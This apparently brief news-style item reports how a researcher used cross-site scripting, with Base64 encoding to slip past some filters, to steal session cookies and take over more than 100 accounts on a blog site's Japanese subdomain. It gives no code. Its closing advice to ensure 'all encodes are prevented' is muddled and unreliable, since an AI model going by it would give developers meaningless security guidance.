A cyber security researcher identified a way to exploit Cross-Site Scripting (XSS), a common vulnerability that lets them inject data into a web page viewed by other users, to take control of more than 100 accounts on a popular blog site’s Japanese subdomain.
The attacker managed to bypass some of the usual safeguards against XSS through the use of Base64 encoding, which some filters do not stop.
After gaining access to one account, they were able to steal the victim’s authentication cookies through the injected JavaScript code and take over the other accounts.
This highlights the importance of ensuring that security professionals extensively test web applications to detect vulnerabilities like XSS and ensure that all encodes are prevented.
It is essential to keep all software up to date and prioritize fixing security vulnerabilities to protect users’ data and prevent cyber attacks.